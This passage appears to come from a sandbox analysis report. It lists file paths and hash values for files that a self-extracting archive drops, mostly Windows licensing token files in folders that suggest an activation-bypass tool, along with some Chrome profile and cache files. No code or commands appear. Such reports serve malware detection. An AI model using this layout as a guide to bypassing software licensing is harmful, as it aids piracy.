SHA512 295525798cc5878ed348ca63694bc073f7c533905363c0ce42887e6be108e005573351532e298b219216f89e435f5123e80d7d35c700e24821c8e22a78402d5b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SecureStartupFeature-ppdlic.xrm-ms

MD5 204b8cddf69c7eea0503b5004773f680
SHA1 72a38aed067a95fb25f6d219022d1d523742e84e
SHA256 cb19f9d4cf3951f2b0cef27c8c59501692d2583c3b1dce711b25ec1e4a5f2bbf
SHA512 3910329d65ea8fa2fb0aa9f4224e0ed858ef9a4fc8bad401bea7a077be9cb00d2e80ed4b95da4d82b6de081a03916c4e44aac5b7134b0296a6bc2825240cadfa

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SecureStartupFeature-ppdlic.xrm-ms

MD5 fb00bd2aa76c1748699f472d350afa54
SHA1 12f070619c275a42728fa4c6cb64acafd8b3997f
SHA256 f985c0a73c3896757456bc27dded4be78815685798130c431b98226128e085a9
SHA512 3d7f75e046f6cfdc437f546a15132f5d5881ec05777b7031a0fe9abb160b4f4cafb87bf26735abe94d05f038c4f49a0b026a8d6e5468311888019d66d33ccacd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\RasBase-ppdlic.xrm-ms

MD5 718e97ac13cee5902e3fdbc8e5c07b75
SHA1 fe7e2ed1afc21ad1523a44333516b01839e45c10
SHA256 0fd10296ea6d14403aedb51a8c03046cdc7a5dcbf9dec86f774d3a8598f06c23
SHA512 375accc721e7292fd3d01ee1446693bbf8ec2b25b7718a3094f9bac6eea16eb089f724f07efb7ef18bc0feba5fa0a86b09ebc7e7fa14205746740734fb0371a2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms

MD5 57b763f840c415946380224c05303876
SHA1 5fe46b83879a96b0f2e1e9ada9d3a6f9db24de14
SHA256 9d2fd0ad48117aeabab29a185cdea02f149e99429322bd056414ad1230f143b8
SHA512 03145f93f9b34587b39ec4d81f2a067f1e267d1bb6f3f66bff37e42d693c066dddf1e9f3313fa092bf9b823394c40cd45d34e5481ea3eca1e7fa9d5143fdac7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 44dff66063bb979c826d6e61f48bbd91
SHA1 0db940b66ffc3c60398e37db21f3b775c3413310
SHA256 88cf764017ea10c50e75c230e4bee9cbdc41f6cffd047f538a705b59da41fd51
SHA512 310d15c95e738930359156e2a5494a58afbbc491221b3da237e5e09c62eb7ed2fc0f8343d9f44aaca593bd05a5d7b19b5ecdffd0b4cec9063628fdb61fa4c937

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Security-SPP-Component-SKU-HomePremium-ppdlic.xrm-ms

MD5 0523b168ca39c80789cc838d43c1f1f4
SHA1 dc1e4a921fa8b5a72a8403d685fe7778aff506de
SHA256 f18e398d521682096e7e71c6989675bac7420e8fca3966dd35af0e0f4c55a7c7
SHA512 bafaed3aca1790fb3421b93bf5c6969aa1d9bca82c9d97e83039ce0ae03da251e9c4ee9626740a5ce1d1cbadb74ff95dbf328519cb9fd88c5fb0e668078bce3b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\skus\Security-SPP-Component-SKU-HomeBasic\Security-SPP-Component-SKU-HomeBasic-ul-phn.xrm-ms

MD5 24629d7a1bfb96bf24ab289785b778c0
SHA1 344f92c8a09dd763045a22d6ff2139b1a5be43cb
SHA256 84f04a487c5b0fbcff3147c17f3bf63567b6b4437b86addc80b0766e38a54b07
SHA512 2a82c2aabaf1a15addf84d55a8f6fc3fb9c0511de82fe568c92d6a32dabf012d1ffa265b9b5e754a3f8db19b5e9304ba9dc0799dda67fb80c78d3230c2b4ce18

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\skus\Security-SPP-Component-SKU-HomeBasic\Security-SPP-Component-SKU-HomeBasic-ul-oob.xrm-ms

MD5 03e9c8140c0efbf64c219cc7efd4f214
SHA1 358142d89ba1528f12b99a1d5e5b20e5e1be32f7
SHA256 b2ffe74876bc15ad8089f3aef9314d977dfe639cb528354ce76bd16ac358abfb
SHA512 08564d3b9b52a4944a1f1077add4ac9ee573860edd0ab429ac7302f361053ec4482a6ec6e3f586db6fd1071b2160f85251263c72195b462b750ff907efe75a08

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\ppdlic\Security-SPP-Component-SKU-HomeBasic-ppdlic.xrm-ms

MD5 efa2ae48ff710aab4bcffab998e7899a
SHA1 3f292481c5d3036190b45b602fde06363ba416fa
SHA256 10e419e1461c1333704bc9b7c974765c7f12a86aeec882b61212eb9834e92134
SHA512 f5ddb7ee27fd5dfd63e2507a1a200dfe7f3ae0a50adbed655c1dffb3b37f9c84b11b9b7268656451f72d9c5c1a61442ec6979bfddfa41949eb3907e11517bb11

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\skus\Security-SPP-Component-SKU-Enterprise\Security-SPP-Component-SKU-Enterprise-ul-phn.xrm-ms

MD5 4437534428de9511706a3cac35b16101
SHA1 884e567eb91510873b9abcb4c92c51f34db807cb
SHA256 77caa1d763bc6a62dab31caed11bf7dfd8f2f1b56ff8e1a3f4057082cf98977e
SHA512 32aaee95c2f9a5d2a021c38a388b4776fb1a58b9d943ac2bd7ba1452535b907409811aa8dab8fe3762ccd8f3f4c571153d3a53c6526bee7dae41fed3548a1f18

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\skus\Security-SPP-Component-SKU-Enterprise\Security-SPP-Component-SKU-Enterprise-ul-oob.xrm-ms

MD5 f32a413f1c3d59176da9828cfd048187
SHA1 bbefda8674fdb190b93a735fc60404bc58b819d7
SHA256 f4ec66c62e86859d2b7f32541c62dedc4fc4ed3d467e8400a656707b20f02850
SHA512 7784424f184a45b4fdfe1251ef23b10c98f93888aab720b627a8c2e30aa0a2a74142cf4213a7b6f58235b351d79262a44f94cdbfd8de98b1e973febabac13db0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\ppdlic\Security-SPP-Component-SKU-Enterprise-ppdlic.xrm-ms

MD5 eaec7e4a3e040bb6e5a5a7060c4ea03b
SHA1 485fa3647dda6f22534681bc381ac07ed701d204
SHA256 882e5f99fac15f101e70aecd6c0852eec94e2de0c222d7e1b51d8d248c6a6965
SHA512 dbb63159ad0650297dc36bfe81ef20f16d1a0a56f9679b36993a8dee4745054c32186038fc0f846a6face02fa2700102845f8b6e6d1b38f6c187208a0438c5d8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Security-Licensing-SLC-ppdlic.xrm-ms

MD5 9e7e23572d1e530910c88ecba0b1a679
SHA1 3e141555ba74c9ee168c545384b637874f35b0df
SHA256 e3d060ea07a8d356498a9287ac89a4a17305d1243b9e10ee1f3c46e972e606fb
SHA512 0f9384b193c8b9d747bf08f45b86046fcf0a7001188b18c8b33ea99e1177fa62cb51d9d4ab607b6cf4e35d89ea3dee0eb4eff77d5a8e3809b951db3e73fa01bc

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms

MD5 5cdb715a6db8c7d1eb87010f0f5cf9d3
SHA1 29f448e4b8ce39bb0810b5bb8bdbd52190b319f0
SHA256 0094bdb31f236b0732afeb81bb614e5b3ae5407d2a337d79b55c092eb3387e8f
SHA512 fd2ce2d4d8d0873b20e0b6f4ff9604d75d1761bff4537b4ee77e1771c2cbb08a9ae4cb871b2944653d4873811a28bfbbdafe249fdb2b84c9b71775251c115b99

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Business\licensing\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms

MD5 9c6de396627100ba3f4f6449101071c2
SHA1 3593b89ff1071d81b0b988733ae4a010c6a083b6
SHA256 3f3e50aaa0892342f5fb17d684a9b08c6491f4d596ba288e7b2147a3a1d8565c
SHA512 052fe7fee9aa307628507d5c130f74c95e37b8d193de9d92fa5c52e009f1d90cf75ab0af3f64ee887cfcb50beb3ec25cebb6eaf00fb07ee15d7e27ccaefdd170

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms

MD5 28d53b28c876f76f3f8d65ba0738ea86
SHA1 8fbf7be305794623bb80f79391485f0fc6cd8532
SHA256 cbd99db274416f8d392c2b4fb06d584a672a14093e1e0f7f8f7ce29edfccec19
SHA512 fae916f8b0b6c19cb814f1efc72d70b166043082ca9ffa6bbd9976aa62bc29b42603fd605c82b4a4623c4b5ff624c5a5586aaf9fc754ded8366d6bdca3ca2d08

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms

MD5 6c8a514c947d8cad0c46f08b1151803e
SHA1 5652386e653da4f9eed839194ee8c883183bf62d
SHA256 683c360e28b4d386df6af4828d756aae1e3eac86f6a08b0e5b29fe99df81d358
SHA512 21dc5bab7228aea531aee2d854f0f9e07b352e8b3836535de70a21c3e4a0d597840b366906af3934d41ae0e5449b092acd205c37841393633c08c0528912f32b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PeerToPeerBase-ppdlic.xrm-ms

MD5 9d211b0d0f167dff803e7f3d91faf882
SHA1 ba0b3d1ab7bb8c0e9421549fe576f3d0145c0d9e
SHA256 77d1625cb7e49d7fea84f77800c75d84eff42e51095ad8b947cbbadfd2bdd421
SHA512 a5480b61b4181c1094b34748c9170d1dd2740971aa41a2da395ba609be9706895bbce6740aa0f5a5e35e7e30aaabb5e6818d6d0035a0ed852c7cf573c0032e88

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\PeerToPeerBase-ppdlic.xrm-ms

MD5 29d1810e433e591b1cd239d94730ec0b
SHA1 77c7b952b2e391dc8ee0b7a0cefb5b7f8e2d6c4d
SHA256 c0a7ac81686469b8aa3714cf4c03d0d26b46745ebac30c558dd3dbb5dd94a6de
SHA512 d2d797ddaafb10db4619807a021b1bcd8abac54bb1c00447b82c51b8b9af30d3d3beae5ff19183ddea59ef391fb5be35da0c77be98e1e00510b8ffb22460cca3

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerBase-ppdlic.xrm-ms

MD5 aae505cdd6c07d13f45f61937791ccdb
SHA1 85c3ee3fab84d3ccf7e3008399118537f5acc9c6
SHA256 148c8a73904bfb54421e4d145242c3a15ce2234de0f6d87bc417a83fad5e8e03
SHA512 4a687ca5de7eec5132daaaee4266e08af5702560f03b45ca0d0c4d1dd4f01f158d56bd7852440a0db1f7d983821ba4c5e30d72424f9bb13a40a506d4df926b39

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 0f19b20c683c2345ecaaee07461e1f20
SHA1 f5d35af2f61e92b8003d41a0aee7a7e78b78bb4d
SHA256 ecd1c6eea89c8dcb10991c1653fa30d92e3054a45f0cf0d46f6265e6d6de11c8
SHA512 35329ca8f2879c58c75a504f72cd76d65f8398a9c5639c4fd7f655a912e5aeda84b08fe8e337a5d1bbbd896187c131612f6e8d50e590e8526201d3218a711220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\default\Professional\tokens\ppdlic\Security-SPP-Component-SKU-Professional-ppdlic.xrm-ms

MD5 7c3005299196f7958bad1c5a535b6dd6
SHA1 ad1b4bffe61549fe4855353bbffb6a892b04dcbd
SHA256 dd32437f13f100e52e80a5a3759cb444210accf6e8bbf08b599c4a03f2757a57
SHA512 d24f0e4cbded670351427ac3e3bde4e2f51afdc8882acff7f71ecdd1ff17e532bed3e547604c37729af39dae4cc83199d317985df565bbae45ebdc98addd04bb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Starter\tokens\ppdlic\Security-SPP-Component-SKU-Starter-ppdlic.xrm-ms

MD5 509919a4163f8f917e1d3c274db35502
SHA1 601ba2e337e479081ba4644f5f64c0500f255d6a
SHA256 dfbf74746430b32cd031b7b395448bc1aa3f62bdee8d9eb126927d04b3c40bc7
SHA512 21fe14e376e02733fffd5fe74904ab1e72a2925d20f35f12efd7917e5a252885d0d5cb9069f191162e6fde3b57ef6053a3ebb544042048730a5325d2499150b9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Security-SPP-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 0c3fde8673610f69d28fb6e033bfafd2
SHA1 5a3b49415166735f6860753727591bc4d1a43102
SHA256 ca4f17f0631d82436c007bbebec0692921e1e0680186e7e4ed1a6459328b1f32
SHA512 db3e979592cda64795ab905b670337f7f0fcc1f8de4fcee70ca2dd5089ae0321c773134bb68fa4789cc80d47a765e61d18eb00a6203efad851db860ee130eb8b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Security-SPP-UX-ppdlic.xrm-ms

MD5 85f2950d444f7caf23e156c8ea699e23
SHA1 c16654e4539d4ba816c4d432feb06b78b3bc2d12
SHA256 58e92197a9b7c766379a65ec5053c60614a8191aee1b77dc10a580901b133edb
SHA512 27c8bffa3e4dd983ffaebcfa9fd9e796ba576471b1c9c44df141b2f70ff66cafc1f07197ec30a6dd899d2de9f86da9d52cd44bf9112bd5615e581508dee4a6a8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms

MD5 b5026c3797f076f39a5fe301d9b63591
SHA1 160ad7cb661dda99e013c4e31f4e703ef30a4f92
SHA256 f6cd558710f5b472e095e469a9ee79231aa203a693ad003343097972ef416b39
SHA512 b962b2f4b82b4c1f76583eac84129986a19d3952a6590454d3add90867fa125099f845f500f41c07e587c52c49a95f3d2576abb09682822ca1ce61b2ad373785

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms

MD5 b7944b89503561196273c0d17502f030
SHA1 ac9940c544ea9abe85d6e9507cfe1c9f9eb27207
SHA256 291ff6ae7bc286866a51c1bf18871e0b5bb0b5fb614041315da4448073de23bb
SHA512 a9748aebc3106662a153a31e5df00ec463d034fff81398069b1051ad7450eb4d64ef0eab16e1e85c1381e16d957902e876d68d7641e04113008852b201aef6b7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell-homegroup-ppdlic.xrm-ms

MD5 5e8913ab7fbaf4bc9be6012e91911b6f
SHA1 16138d3b92b402a7e425e18a36c88e2cbea265f8
SHA256 97b0d12d1637ec0f8a3e317c1f2a2ce7b766dc4e160882f36db497034824c316
SHA512 c6de263030a767b9ac493d02631c0a8dff7cd4d2a2a964047dafc91e404dd9e1e965295c6f9e3f9eee55227a70f7685d9cdcfc6bc73fa02cda82ed6e367c8f15

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\shell-homegroup-ppdlic.xrm-ms

MD5 0229e957d495c4244b7820a2893216c7
SHA1 f74e192cd1355d170189d667831ff73271406c9a
SHA256 fbde6fb95e094c38fd25661621a9da4dee09fe286b82d618cb407fb8fdcbd2da
SHA512 8cafa492dcf5bd58da2a4d30d0d5a3beeca50c04151a9b08bc9cf7be645282b441869bff6f919215f788871dd94b95638cd7d78894fd704ac4d9c6e2090ff51f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-UX-ppdlic.xrm-ms

MD5 5f01f3f0e3aee9dcd3b20f25ff47e2b6
SHA1 61e102acb5ee67e208a97d1342ab206fbcc0ce48
SHA256 8b796e4ec3443d3edf1b07ce82aaf185e7a778ec5f9700f110b095fdf98e646b
SHA512 b6af034517f1bac9d18569a852b6fffac2dcd57baf5bf1d62f687476b24d69d72d86be9445c5215459c670315329383d9b58800b4d12bb6b0b2101a9ea4f3895

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-ppdlic.xrm-ms

MD5 894949e794db63353c8fde78b8d36bd9
SHA1 63a63eaa27eb8aee50dc817af6277ce046400c48
SHA256 dcfd08d3f83d0f39ed3e02d32b172085b9b1a5251e96dfa73619254d17267511
SHA512 6553e732525c4a3cfc283fbf74e90b052ec3d1d7f347dda988705961cd525b9305b9a324dd8e5554978fb5d4e28aa9234bc896fdc159f43cc4e54893919b5dd5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\oem\tokens\ppdlic\Security-SPP-Component-SKU-Ultimate-ppdlic.xrm-ms

MD5 4d24edb585cd787b29146a32818bf1dd
SHA1 52e06e729d8be61c4564c3abdbe99b91412ef5d8
SHA256 19f434de6e514f97945ec78df35c8e4914e0c569ca525507f2aede4351e13740
SHA512 c684ab2f0d659acef76a4306ce2d9ef08767fbd89321cd14e45d640c18295bc135e005cd712cb84dbd409892831c29863d223eb065edd743e483c901c0b96f56

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

MD5 388c40be7d7a42327b4b54351cade537
SHA1 56b39630ca3ed82b0635bc3be19cf6ef5e01126b
SHA256 af18a46c85736811d3875c096be4eb47e38c515f1c4c7ec3d9295d829afd43ef
SHA512 e10e988e2ea49bb9d71c24c7be22236a9450b5f929b3dc0e231d317e99c2b6ee9ad4d91636c590c1c7a5f0a1af67ba623a1558b596ecb8ec8ee88c5a775ad82d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms

MD5 0ee363e7db60642ecc603f3b1a738a46
SHA1 adb6166efef8b6e237ea433e0c019f493793f1a3
SHA256 39a10724afa23aebe57d792ed399a9c6fa81809b7e44872bc786b68d7fd8fa4d
SHA512 18eab2c8af20e4f88e6dc438392032f2a20f0043fe82c076d6aa9092e41d8bf85c59d5cd78b4b0a1d875f35689263edae3d13a1af44c9508b49a1e27d33711e4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms

MD5 b91e43195bc615767ecedbdf85b54143
SHA1 16a584129d42b4d382f733597a16af3f1a244b00
SHA256 c01663b9e078e3c48601963c9b7d18f8ca64b52f1dde0475e52ef6451bc6653c
SHA512 ad7543ec01e16b4c8ab7d61aa3fcd835702494bef8159932389e4cc8ced346b745a0d7bf11a0f290417d5c07871e65de08e81dcdf30d15316a9dded5f5545650

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms

MD5 d45117903c746a6f4482eb25bb579434
SHA1 61ef551971aaca0764a3dfbba819ba72dbbc77b9
SHA256 008c0d674f98e2634d99e708bb22c135ba53d151038b9892acd39fb1493e295e
SHA512 59317827ca970b93086c815962cc7a951c7e79119ee0b7a354a5a3f01264985d88684e722497fb9dad6174fdc46d4d9b19f79e9be2e6b48dd2564694b274344f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms

MD5 05a0c02123cc650bd6dc70c256262d2e
SHA1 1f18b25b3eeff7cc87de9f224e332db428f7cf4e
SHA256 c195f6130e3755a06cb63c1ba16be99f0579b160018c9b6731e4d56d3d8ac7bb
SHA512 8a342d5d7c10d00b7bf99e520d98ca892c863cb3798c1958d103389d594293dd375d6de62bcd2a665594033bbd64198138429d19b5d9efd9d4d71786bcaa883c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms

MD5 0c447b7bd0c9e11b7e8b6cc7aff24f81
SHA1 bb024361afce85473470048812b378a02d9a3e01
SHA256 26271eed367732f4794b6536c717872cb9857a32f347e2c448693ec92dea8a63
SHA512 cba307d3e33edbbe7bad2d39b5534660b88880d6eb38e64f0620d751554ffa25b29c5308c2e62490fd04a6b9d50b88650c24784516fe77a6d26d7c34b9a85cd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms

MD5 07a40033b73e0f53a922252f6a3efe19
SHA1 c997f7b2babcfa586e98138d3ddf4fac950869c3
SHA256 edff96a84d3f506c101d38bfdfe0eb8a85dc713a38f755161615913c2a830e5e
SHA512 c017f74b438b85b5b65c5aac990dcf9be918b9efc614d4fbdcc5ee6cbdbff02b9d99e1533b1979d761d99baaebe2dd5db599a9f3e2a8a5c21ac0cae2a575c2b9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms

MD5 ad6f39bcfc3f6e83e98e3a3b76d7a005
SHA1 dcecb722e5109a0f5e12adbcb49157fdfd3b99d7
SHA256 7941b35cccde7dc4d029197a38d92542eb57c66a667dd300129f08a73d56ab1a
SHA512 ff4f2b9eae8250cc53d5b1b3fe0eb5724999667f2100c7a6f9edaae1458c034f2605011bc4ec77e5354a94d9df9ff0a4bc5d2fba8434aadd4576a95c1db8eb7e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms

MD5 d4d4c43acd462ee281bba31fb122907b
SHA1 03086696e0c16dad19e36c7d3057c96122cc752a
SHA256 93d8fb79ee7118203ddaf295a4cd5d5abf4d04a5f88d11c7c0a7611bde43615c
SHA512 840cd7604b3bb61dbbfb5ac906da7aa1d8db7bf41006d14dd6fc9eb1040b73ceb0e239996999927d4388e6ba7db8de3810086ced66316253939483a9f70c7a09

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms

MD5 391bd2a7cc60929d685db240330cba2b
SHA1 fd802854cc759635c0d7b7caf036a57fedc7a944
SHA256 93439a9703836715414b6f8b7e763d88f07d22f9e8f3e9a158ac1d40643c5654
SHA512 0be565462458ea1559da424b14d5ca5fa3833d19fb3e116a6a330cecbf53435ee31f06f9c0684fe11f52e409fe52116688062f3796be0f6e242e89200b125e1c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms

MD5 90684bbf7770b6f733e1abce52d8bb79
SHA1 94d414f25899e958d107407ebab13fe5664e57fc
SHA256 671263f12125b7f597097a07ebd44bc2caa04bbff01b7a8330341a211e163577
SHA512 097eb309bb3d5f48ae7e149075a9ba4fa5dbce405276dedeb89428e60eb9f817a2988a8770654dc3db76d31756b983e695a1a357e1d731b83e8956ae919e28ae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f6371cedff8edda6823d5fb20a73e3a9
SHA1 a299e58ea5e59c7e7ebc82d8ccad901cece4c87f
SHA256 7afdb93ae5893c41425055d84f0a70c3c96c87c92636230196c1d9871a71e20e
SHA512 f62c71730f916b126b60f8c7b42ed00b724424a8261b933d6201501e2b1db64a0c128ef74b39b2be71df429783a0698a9a674df95e4c21c93064e9938d2b6d04

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-Solitaire-ppdlic.xrm-ms

MD5 668aae567688e2e54fd437bd729bc738
SHA1 54b8e2b66ba2a24712f6539be801216c805af6a8
SHA256 b94b5b631272da59fc13f7965fca08a7e5d65ae73b8c4eb7392f2db7f09e154b
SHA512 13189dd13be64c2595d88f5bb5a7b4f1a8f83ea9cdae9b003c70223e3e2306e0a871c7639e65b71348eeb3740f5ba8754d6a5687f8a1f51a41369216572452a4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Common-ppdlic.xrm-ms

MD5 7697679362e88ee6d230172ba820f673
SHA1 33b3c5383ea99561ac056f69085e00b520274a0c
SHA256 d7bc8a195e650b51b293df07e6ef3c53d97244195279f437bce3b01f5ffd87bd
SHA512 27d3854831496b1290cff89786bc1e163061c82d2f6b784525e8cf21942ce33e505bdc75eabf221cbb7049ff15d02ca572258e83b35bfecf03ac47eb43a8bbc7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Spades-ppdlic.xrm-ms

MD5 79e9eeb881835d448a6ddce929ad4108
SHA1 2d873cd9ff409a0dfb345e001e6624e86203ec95
SHA256 b4f3a53c9d882ffad11e13f2f14d060500a6630a5fa70c41810025ffbde47d55
SHA512 1451a195bcb87caf306f88ae70d475c491567848150c341ea3c655ce0b6e982051f38df07a6a40e769da16fb747d32351bb0e13c22199d640d27af03a2fb2fd8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Checkers-ppdlic.xrm-ms

MD5 0e11804000bb4463ad0a073cb793c79e
SHA1 1341bb5ae535d2f532d490fe49fef6a1dc416e52
SHA256 2fb989ffa9b86431547444e6da5b2532d8e29dd40c2b352ff58dc889b3487301
SHA512 89b91f60fd3e79fbfa33f6d4e3ebab04f7074edcf2ff97b634b63c38f2dd6d37d84278bb4c9da084bcba900d6559fde63202546e6dec790786237d1e1dc23228

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Shell-MultiplayerInboxGames-Backgammon-ppdlic.xrm-ms

MD5 a9390f550087d8b66369ddceb8b7935c
SHA1 64f3c4e0d662993718eac173de0c3495f42e2666
SHA256 5126a4ce725d6a80dabc9bc3c2fbe0318e10f99f6ff13374d46f8f0de77a315a
SHA512 34d2a787d3628badab474978cca3a1382818fbe2c731842c5342c68a66bce69a7bd94e0244dbcf8e45015a6e99b651cf2dffc7148a2c077870baec0b763921a9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-SpiderSolitaire-ppdlic.xrm-ms

MD5 10022005d581ca1e4fcca2040d28148e
SHA1 d607186a0cf5eeb3ff830d2e2e1f496c913691b7
SHA256 9643d60a8b0715fe0d287c7a1aab8d15509a025b94ee7dc56d48c5c8c4552df9
SHA512 d117f02c53fd2b2792989b5a2cd779264fbe6985cf328ec66d0b51cfbfad124243c5164346d853a14b650ed03328a7bba79270744c0998d851c6d5d2746b1d75

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SMBServer-ppdlic.xrm-ms

MD5 bafff5458c6cd314f0f808d3135c5df5
SHA1 5e0681cecff791bf3a76143405aa996b93473419
SHA256 e3358d23befe2c94518263c9e066298138964d6d45c83bb4befd1bc29009e504
SHA512 f6d480f9bdacfdfddc0ab697051c848f631ca96bd2b83bc20c60be022327946d0146eca8926052fd0b19692feca55c1acccdb99a94faa97f1c8c850a189a68bc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

MD5 1aca735014a6bb648f468ee476680d5b
SHA1 6d28e3ae6e42784769199948211e3aa0806fa62c
SHA256 e563f60814c73c0f4261067bd14c15f2c7f72ed2906670ed4076ebe0d6e9244a
SHA512 808aa9af5a3164f31466af4bac25c8a8c3f19910579cf176033359500c8e26f0a96cdc68ccf8808b65937dc87c121238c1c1b0be296d4306d5d197a1e4c38e86

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\SMBServer-ppdlic.xrm-ms

MD5 7443ebab04bfac164d28e5a246849540
SHA1 5fd4a8ba3a20c5fd5d9769c3c1fcd7193b2b1999
SHA256 abcc57d5c4cb48f99bab71d9855f55b05503b3e4362983e7ff05b9bc366a2322
SHA512 f43a8f94bf99020dc0c32fc9e3852a8537d6597de46fb9490af5add4841efd044a88e36a3daae03b305e47b9caec9adcb1fa632f8c83f5a46e27cd09b9b62fdf

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\SnippingToolLicensing-ppdlic.xrm-ms

MD5 86e2fb2c0a6236e2189733d2facb2a98
SHA1 1098eee45af4b12b5d35181b22f860c026a3440d
